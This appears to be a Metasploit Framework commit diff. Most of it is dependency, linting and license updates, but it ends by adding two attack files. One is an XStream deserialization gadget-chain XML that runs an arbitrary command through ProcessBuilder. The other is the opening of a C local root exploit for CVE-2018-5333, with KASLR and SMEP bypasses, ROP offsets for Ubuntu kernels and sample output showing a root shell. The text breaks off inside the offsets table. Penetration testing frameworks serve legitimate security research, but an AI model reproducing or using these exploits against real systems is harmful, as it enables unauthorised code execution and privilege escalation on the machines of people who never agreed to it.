automatic module_metadata_base.json update

Land #12877 , rand_text fix for doublepulsar_rce
Prefer exploit.rb's rand_text wrapper
2020-01-22 16:42:45 -06:00 · 2020-01-22 16:40:24 -06:00 · 2020-01-22 16:37:36 -06:00 · 2020-01-22 14:53:12 -06:00 · 2020-01-22 17:00:22 +00:00 · 2020-01-22 09:41:39 -06:00
555 changed files with 16165 additions and 3103 deletions
@@ -25,6 +25,7 @@ pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
 shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
+smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
 space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
 tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
 todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
@@ -112,7 +112,7 @@ Metrics/MethodLength:
                  often exceed 200 lines.
  Max: 300

-Naming/UncommunicativeMethodParamName:
+Naming/MethodParameterName:            
  Enabled: true
  Description: 'Whoever made this requirement never looked at crypto methods, IV'
  MinNameLength: 2
@@ -126,7 +126,7 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Layout/AlignHash:
+Layout/HashAlignment:
  Enabled: false
  Description: 'aligning info hashes to match these rules is almost impossible to get right'

@@ -142,7 +142,7 @@ Layout/EmptyLinesAroundMethodBody:
  Enabled: false
  Description: 'these are used to increase readability'

-Layout/AlignParameters:
+Layout/ParameterAlignment:
  Enabled: true
  EnforcedStyle: 'with_fixed_indentation'
  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
@@ -43,7 +43,7 @@ before_install:
  - ls -la ./.git/hooks
  - ./.git/hooks/post-merge
  # Update the bundler
-  - gem update --system
+  - gem update --system 3.0.6
  - gem install bundler
 before_script:
  - cp config/database.yml.travis config/database.yml
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2018, Rapid7, Inc.
+Copyright (C) 2006-2020, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -27,9 +27,9 @@ RUN apk add --no-cache \
      zlib-dev \
      ncurses-dev \
      git \
-    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
-    && gem update --system \
-    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
+    && echo "gem: --no-document" > /etc/gemrc \
+    && gem update --system 3.0.6 \
+    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
    # needed so non root users can read content of the bundle
@@ -1,14 +1,13 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.60)
+    metasploit-framework (5.0.71)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      aws-sdk-ec2
      aws-sdk-iam
      aws-sdk-s3
-      backports
      bcrypt (= 3.1.12)
      bcrypt_pbkdf
      bit-struct
@@ -16,16 +15,19 @@ PATH
      dnsruby
      ed25519
      em-http-request
+      eventmachine
      faker
+      faraday (<= 0.17.0)
+      faye-websocket
      filesize
      jsobfu
      json
      metasm
-      metasploit-concern
-      metasploit-credential
-      metasploit-model
-      metasploit-payloads (= 1.3.79)
-      metasploit_data_models (= 3.0.10)
+      metasploit-concern (~> 2.0.0)
+      metasploit-credential (~> 3.0.0)
+      metasploit-model (~> 2.0.4)
+      metasploit-payloads (= 1.3.83)
+      metasploit_data_models (~> 3.0.10)
      metasploit_payloads-mettle (= 0.5.16)
      mqtt
      msgpack
@@ -112,40 +114,39 @@ GEM
      public_suffix (>= 2.0.2, < 5.0)
    afm (0.2.2)
    arel (6.0.4)
-    arel-helpers (2.10.0)
+    arel-helpers (2.11.0)
      activerecord (>= 3.1.0, < 7)
    aws-eventstream (1.0.3)
-    aws-partitions (1.235.0)
-    aws-sdk-core (3.75.0)
+    aws-partitions (1.264.0)
+    aws-sdk-core (3.89.1)
      aws-eventstream (~> 1.0, >= 1.0.2)
-      aws-partitions (~> 1, >= 1.228.0)
+      aws-partitions (~> 1, >= 1.239.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.115.0)
+    aws-sdk-ec2 (1.134.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.31.0)
+    aws-sdk-iam (1.32.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.25.0)
+    aws-sdk-kms (1.27.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.53.0)
-      aws-sdk-core (~> 3, >= 3.71.0)
+    aws-sdk-s3 (1.60.1)
+      aws-sdk-core (~> 3, >= 3.83.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.1)
    aws-sigv4 (1.1.0)
      aws-eventstream (~> 1.0, >= 1.0.2)
-    backports (3.15.0)
    bcrypt (3.1.12)
    bcrypt_pbkdf (1.0.1)
    bindata (2.4.4)
    bit-struct (0.16)
-    builder (3.2.3)
+    builder (3.2.4)
    coderay (1.1.2)
    concurrent-ruby (1.0.5)
    cookiejar (0.3.3)
-    crass (1.0.5)
+    crass (1.0.6)
    daemons (1.3.1)
    diff-lcs (1.3)
    dnsruby (1.61.3)
@@ -171,6 +172,9 @@ GEM
      i18n (>= 0.8)
    faraday (0.17.0)
      multipart-post (>= 1.2, < 3)
+    faye-websocket (0.10.9)
+      eventmachine (>= 0.12.0)
+      websocket-driver (>= 0.5.1)
    filesize (0.2.0)
    fivemat (1.3.7)
    hashery (2.1.2)
@@ -180,8 +184,8 @@ GEM
    jmespath (1.4.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.2.0)
-    loofah (2.3.1)
+    json (2.3.0)
+    loofah (2.4.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
    metasm (1.0.4)
@@ -189,7 +193,7 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (3.0.3)
+    metasploit-credential (3.0.4)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 3.0.0)
@@ -203,7 +207,7 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.79)
+    metasploit-payloads (1.3.83)
    metasploit_data_models (3.0.10)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -217,7 +221,7 @@ GEM
    metasploit_payloads-mettle (0.5.16)
    method_source (0.9.2)
    mini_portile2 (2.4.0)
-    minitest (5.13.0)
+    minitest (5.14.0)
    mqtt (0.5.0)
    msgpack (1.3.1)
    multipart-post (2.1.1)
@@ -225,9 +229,10 @@ GEM
    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.10.5)
+    nokogiri (1.10.7)
      mini_portile2 (~> 2.4.0)
-    octokit (4.14.0)
+    octokit (4.15.0)
+      faraday (>= 0.9)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
@@ -235,7 +240,7 @@ GEM
      pcaprub
    patch_finder (1.0.2)
    pcaprub (0.13.0)
-    pdf-reader (2.3.0)
+    pdf-reader (2.4.0)
      Ascii85 (~> 1.0.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
@@ -250,8 +255,8 @@ GEM
    pry (0.12.2)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
-    public_suffix (4.0.1)
-    rack (1.6.11)
+    public_suffix (4.0.3)
+    rack (1.6.12)
    rack-protection (1.5.5)
      rack
    rack-test (0.6.3)
@@ -269,9 +274,9 @@ GEM
      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (13.0.0)
+    rake (13.0.1)
    rb-readline (0.5.5)
-    recog (2.3.5)
+    recog (2.3.6)
      nokogiri
    redcarpet (3.5.0)
    rex-arch (0.1.13)
@@ -287,7 +292,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.21)
+    rex-exploitation (0.1.22)
      jsobfu
      metasm
      rex-arch
@@ -300,7 +305,7 @@ GEM
      rex-arch
    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.82)
+    rex-powershell (0.1.84)
      rex-random_identifier
      rex-text
    rex-random_identifier (0.1.4)
@@ -310,7 +315,7 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.20)
+    rex-socket (0.1.21)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
@@ -325,12 +330,12 @@ GEM
      rspec-core (~> 3.9.0)
      rspec-expectations (~> 3.9.0)
      rspec-mocks (~> 3.9.0)
-    rspec-core (3.9.0)
-      rspec-support (~> 3.9.0)
+    rspec-core (3.9.1)
+      rspec-support (~> 3.9.1)
    rspec-expectations (3.9.0)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.9.0)
-    rspec-mocks (3.9.0)
+    rspec-mocks (3.9.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.9.0)
    rspec-rails (3.9.0)
@@ -343,7 +348,7 @@ GEM
      rspec-support (~> 3.9.0)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.9.0)
+    rspec-support (3.9.2)
    ruby-macho (2.2.0)
    ruby-rc4 (0.1.5)
    ruby_smb (1.1.0)
@@ -371,23 +376,26 @@ GEM
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (0.20.3)
+    thor (1.0.1)
    thread_safe (0.3.6)
    tilt (2.0.10)
    timecop (0.9.1)
-    ttfunk (1.5.1)
-    tzinfo (1.2.5)
+    ttfunk (1.6.1)
+    tzinfo (1.2.6)
      thread_safe (~> 0.1)
    tzinfo-data (1.2019.3)
      tzinfo (>= 1.0.0)
    warden (1.2.7)
      rack (>= 1.0)
+    websocket-driver (0.7.1)
+      websocket-extensions (>= 0.1.0)
+    websocket-extensions (0.1.4)
    windows_error (0.1.2)
    xdr (2.0.0)
      activemodel (>= 4.2.7)
      activesupport (>= 4.2.7)
    xmlrpc (0.3.0)
-    yard (0.9.20)
+    yard (0.9.24)

 PLATFORMS
  ruby
@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2018, Rapid7, Inc.
+Copyright: 2006-2020, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -8,26 +8,25 @@ activesupport, 4.2.11.1, MIT
 addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.10.0, MIT
+arel-helpers, 2.11.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.235.0, "Apache 2.0"
-aws-sdk-core, 3.75.0, "Apache 2.0"
-aws-sdk-ec2, 1.115.0, "Apache 2.0"
-aws-sdk-iam, 1.31.0, "Apache 2.0"
-aws-sdk-kms, 1.25.0, "Apache 2.0"
-aws-sdk-s3, 1.53.0, "Apache 2.0"
+aws-partitions, 1.264.0, "Apache 2.0"
+aws-sdk-core, 3.89.1, "Apache 2.0"
+aws-sdk-ec2, 1.134.0, "Apache 2.0"
+aws-sdk-iam, 1.32.0, "Apache 2.0"
+aws-sdk-kms, 1.27.0, "Apache 2.0"
+aws-sdk-s3, 1.60.1, "Apache 2.0"
 aws-sigv4, 1.1.0, "Apache 2.0"
-backports, 3.15.0, MIT
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
 bindata, 2.4.4, ruby
 bit-struct, 0.16, ruby
-builder, 3.2.3, MIT
+builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
-crass, 1.0.5, MIT
+crass, 1.0.6, MIT
 daemons, 1.3.1, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.3, "Apache 2.0"
@@ -41,6 +40,7 @@ factory_bot, 5.1.1, MIT
 factory_bot_rails, 5.1.1, MIT
 faker, 2.2.1, MIT
 faraday, 0.17.0, MIT
+faye-websocket, 0.10.9, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
@@ -48,19 +48,19 @@ http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
 jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.2.0, ruby
-loofah, 2.3.1, MIT
+json, 2.3.0, ruby
+loofah, 2.4.0, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 3.0.3, "New BSD"
-metasploit-framework, 5.0.60, "New BSD"
+metasploit-credential, 3.0.4, "New BSD"
+metasploit-framework, 5.0.71, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.79, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.83, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
 metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
-minitest, 5.13.0, MIT
+minitest, 5.14.0, MIT
 mqtt, 0.5.0, MIT
 msgpack, 1.3.1, "Apache 2.0"
 multipart-post, 2.1.1, MIT
@@ -68,56 +68,56 @@ nessus_rest, 0.1.6, MIT
 net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.5, MIT
-octokit, 4.14.0, MIT
+nokogiri, 1.10.7, MIT
+octokit, 4.15.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
-pdf-reader, 2.3.0, MIT
+pdf-reader, 2.4.0, MIT
 pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
-public_suffix, 4.0.1, MIT
-rack, 1.6.11, MIT
+public_suffix, 4.0.3, MIT
+rack, 1.6.12, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
 rails-html-sanitizer, 1.3.0, MIT
 railties, 4.2.11.1, MIT
-rake, 13.0.0, MIT
+rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.5, unknown
+recog, 2.3.6, unknown
 redcarpet, 3.5.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.21, "New BSD"
+rex-exploitation, 0.1.22, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.82, "New BSD"
+rex-powershell, 0.1.84, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.20, "New BSD"
+rex-socket, 0.1.21, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
 rex-text, 0.2.24, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.9.0, MIT
-rspec-core, 3.9.0, MIT
+rspec-core, 3.9.1, MIT
 rspec-expectations, 3.9.0, MIT
-rspec-mocks, 3.9.0, MIT
+rspec-mocks, 3.9.1, MIT
 rspec-rails, 3.9.0, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.9.0, MIT
+rspec-support, 3.9.2, MIT
 ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
@@ -131,15 +131,17 @@ sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
 thin, 1.7.2, "GPLv2+, Ruby 1.8"
-thor, 0.20.3, MIT
+thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
-ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.5, MIT
+ttfunk, 1.6.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.6, MIT
 tzinfo-data, 1.2019.3, MIT
 warden, 1.2.7, MIT
+websocket-driver, 0.7.1, "Apache 2.0"
+websocket-extensions, 0.1.4, "Apache 2.0"
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.20, MIT
+yard, 0.9.24, MIT
@@ -0,0 +1,54 @@
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="java.lang.ProcessBuilder">
+                      <command>
+                        <%=payload_cmd%>
+                      </command>
+                      <redirectErrorStream>false</redirectErrorStream>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>java.lang.ProcessBuilder</class>
+                      <name>start</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer></ibuffer>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>
@@ -0,0 +1,883 @@
+// Local root exploit for Linux RDS rds_atomic_free_op NULL pointer dereference
+// in the rds kernel module in the Linux kernel through 4.14.13 (CVE-2018-5333).
+//
+// Includes KASLR, SMEP, and mmap_min_addr bypasses. No SMAP bypass.
+//
+// Targets:
+// - Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116
+// - Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54
+//
+// The rds kernel module is not loaded by default on Ubuntu, and is blacklisted
+// in /etc/modprobe.d/blacklist-rare-network.conf to prevent autoloading.
+// - install: sudo apt install "linux-image-extra-$(uname -r)-generic"
+// - load:    sudo insmod "/lib/modules/$(uname -r)/kernel/net/rds/rds.ko"
+//
+// This exploit is a modified extension of the original local root
+// proof of concept exploit written by wbowling as an example of using
+// CVE-2019-9213 to make previous kernel bugs exploitable:
+// - https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4
+//
+// The original exploit is based on the null pointer dereference
+// reproducer proof of concept and analysis by 0x36:
+// - https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+//
+// wbowling has done most of the hard work, by utilising Jann Horn's
+// mmap_min_addr bypass technique (CVE-2019-9213), allowing userland to mmap
+// virtual address 0 (without which this bug would not be exploitable on
+// systems with a sufficiently large value for vm.mmap_min_addr);
+// and developing the appropriate ROP chain.
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+//
+// This exploit adds offsets for additional kernels, and introduces some
+// additional features, such as KASLR bypasses and system checks, including:
+// - check if system supports SMAP
+// - check if system supports RDS sockets
+// - Jann Horn's mincore KASLR bypass via heap page disclosure (CVE-2017-16994)
+//   - https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+// - spender's /proc/kallsyms KASLR bypass (requires kernel.kptr_restrict=0)
+//   - https://grsecurity.net/~spender/exploits/exploit.txt
+// - xairy's syslog KASLR bypass (requires kernel.dmesg_restrict=0)
+//   - https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+// - lizzie's perf_event_open KASLR bypass (requires kernel.perf_event_paranoid<2)
+//   - https://blog.lizzie.io/kaslr-and-perf.html
+//
+// Shoutout to nstarke for adding additional kernel offsets.
+// - https://github.com/bcoles/kernel-exploits/pulls?q=author:nstarke+cve-2018-5333
+//
+// This exploit also uses various code patterns copied from:
+// - xairy's exploits:
+//   - https://github.com/xairy/kernel-exploits
+// - vnik's kernel ROP code:
+//   - https://github.com/vnik5287/kernel_rop
+// ---
+// $ gcc cve-2018-5333.c -o cve-2018-5333 -Wall
+// $ ./cve-2018-5333
+// Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
+// [.] checking kernel version...
+// [.] kernel version '4.4.0-116-generic #140-Ubuntu' detected
+// [~] done, version looks good
+// [.] checking system...
+// [~] done, looks good
+// [.] mapping null address...
+// [~] done, mapped null address
+// [.] KASLR bypass enabled, getting kernel base address
+// [.] trying /proc/kallsyms...
+// [-] kernel base not found in /proc/kallsyms
+// [.] trying syslog...
+// [-] kernel base not found in syslog
+// [.] trying perf_event_open sampling...
+// [.] done, kernel text:   ffffffff9f000000
+// [.] commit_creds:        ffffffff9f0a4cf0
+// [.] prepare_kernel_cred: ffffffff9f0a50e0
+// [.] mmapping fake stack...
+// [~] done, fake stack mmapped
+// [.] executing payload 0x402119...
+// [+] got root
+// # id
+// uid=0(root) gid=0(root) groups=0(root)
+// ---
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-5333
+// <bcoles@gmail.com>
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <linux/perf_event.h>
+#include <netinet/in.h>
+#include <sys/ioctl.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ENABLE_SYSTEM_CHECKS            1
+#define ENABLE_KASLR_BYPASS             1
+
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN               0xffffffff00000000ul
+#  define KERNEL_BASE_MAX               0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS  1
+#  define ENABLE_KASLR_BYPASS_SYSLOG    1
+#  define ENABLE_KASLR_BYPASS_PERF      1
+#  define ENABLE_KASLR_BYPASS_MINCORE   1
+#endif
+
+// Can be overwritten by argv[1]
+char *SHELL = "/bin/sh";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions().
+int kernel = -1;
+
+// kernel target struct, using ROP chain from wbowling's exploit
+struct kernel_info {
+  const char* kernel_version;
+  uint64_t commit_creds;
+  uint64_t prepare_kernel_cred;
+  uint64_t xor_rdi;     //: xor edi, edi ; ret
+  uint64_t mov_rdi_rax; //: mov rdi, rax ; pop rbx ; mov rax, rdi ; pop r12 ; pop rbp ; ret
+  uint64_t xchg_esp;    //: xchg eax, esp ; shr bl, 0xbf ; xor eax, eax ; pop rbp ; ret
+  uint64_t swapgs;      //: swapgs ; pop rbp ; ret
+  uint64_t iretq;       //: iretq
+};
+
+// Targets
+struct kernel_info kernels[] = {
+  { "4.4.0-21-generic #37-Ubuntu",   0xa21c0, 0xa25b0, 0x5d0c5, 0x178157, 0x3f8158, 0x64644, 0x4cc7da },
+  { "4.4.0-22-generic #40-Ubuntu",   0xa2220, 0xa2610, 0x5d0c5, 0x178217, 0x3f89e8, 0x64644, 0x7d005  },
+  { "4.4.0-24-generic #43-Ubuntu",   0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125  },
+  { "4.4.0-28-generic #47-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc  },
+  { "4.4.0-31-generic #50-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125  },
+  { "4.4.0-38-generic #57-Ubuntu",   0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5  },
+  { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-98-generic #121-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x17a427, 0x40a138, 0x64694, 0x4b243  },
+  { "4.4.0-108-generic #131-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-109-generic #132-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
+  { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
+
+  /* Untested:
+  { "4.4.0-51-generic #72-Ubuntu",   0xa2670, 0xa2a60, 0x5d0c5, 0x178cf7, 0x404d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-62-generic #83-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179747, 0x406a78, 0x64634, 0x7d1e5  },
+  { "4.4.0-63-generic #84-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-66-generic #87-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-70-generic #91-Ubuntu",   0xa27b0, 0xa2ba0, 0x5d0c5, 0x179847, 0x4070c8, 0x64664, 0x406eb  },
+  { "4.4.0-79-generic #100-Ubuntu",  0xa2800, 0xa2bf0, 0x5d0c5, 0x179a67, 0x408338, 0x64664, 0x7d235  },
+  { "4.4.0-87-generic #110-Ubuntu",  0xa2860, 0xa2c50, 0x5d0c5, 0x179ca7, 0x408768, 0x64694, 0x7d285  },
+  { "4.4.0-89-generic #112-Ubuntu",  0xa28a0, 0xa2c90, 0x5d0c5, 0x179d27, 0x408ae8, 0x64694, 0x7d265  },
+  { "4.4.0-96-generic #119-Ubuntu",  0xa28c0, 0xa2cb0, 0x5d0c5, 0x179e27, 0x409a48, 0x64694, 0x7d235  },
+  { "4.4.0-97-generic #120-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x179e47, 0x409a58, 0x64694, 0x4ed41  },
+  */
+
+  { "4.4.0-21-lowlatency #37-Ubuntu",   0xa3150, 0xa3560, 0x5e0c5, 0x17b2c7, 0x401288, 0x64d34, 0x7d95c },
+  { "4.4.0-22-lowlatency #40-Ubuntu",   0xa31c0, 0xa35d0, 0x5e0c5, 0x17b397, 0x401b48, 0x64d34, 0x7d9bc },
+  { "4.4.0-24-lowlatency #43-Ubuntu",   0xa32e0, 0xa36f0, 0x5e0c5, 0x17b5e7, 0x402958, 0x64d34, 0x7dadc },
+  { "4.4.0-28-lowlatency #47-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b8c7, 0x402f48, 0x64d34, 0x7dadc },
+  //{ "4.4.0-31-lowlatency #50-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409018, 0x64d34, 0x7dadc },
+  //{ "4.4.0-34-lowlatency #53-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409088, 0x64d34, 0x7dadc },
+  { "4.4.0-36-lowlatency #55-Ubuntu",   0xa3430, 0xa3840, 0x5e0c5, 0x17b9e7, 0x409318, 0x64d24, 0x7dacc },
